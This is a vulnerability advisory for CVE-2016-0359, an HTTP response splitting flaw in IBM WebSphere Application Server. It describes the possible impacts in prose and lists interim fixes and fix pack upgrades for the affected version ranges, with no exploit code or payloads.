HTTP response splitting attacks - CVE-2016-0359
Published: June 29, 2016 / Updated: July 1, 2016
Detailed vulnerability description
The vulnerability exists due to input validation error when parsing HTTP requests. A remote unauthenticated attacker can display arbitrary content by submiting a specially crafted URL to cause the target server to return a split response.
Successful exploitation of this vulnerability may allow an attacker to poison cache of any intermediate proxy server and display arbitrary content in victim's browser. The attacker might be able to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.
How to mitigate CVE-2016-0359
The recommended solution is to apply the interim fix, Fix Pack or PTF containing APAR PI58918 for each named product as soon as practical.
For WebSphere Application Server:
For V8.5.0.0 through 8.5.5.9 Liberty:
Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PI58918
--OR--
Apply Liberty Fix Pack 16.0.0.2 or later (targeted availability 24 June 2016).
For V8.5.0.0 through 8.5.5.9 Full Profile:
Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PI58918
--OR--
Apply Fix Pack 8.5.5.10 or later (targeted availability 15 August 2016).
For V8.0.0.0 through 8.0.0.12:
Upgrade to a minimal fix pack levels as required by interim fix and then apply Interim Fix PI58918
--OR--
Apply Fix Pack 8.0.0.13 or later (targeted availability 24 October 2016).
For V7.0.0.0 through 7.0.0.41:
Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PI58918
--OR--
Apply Fix Pack 7.0.0.43 or later (targeted availability 2Q2017).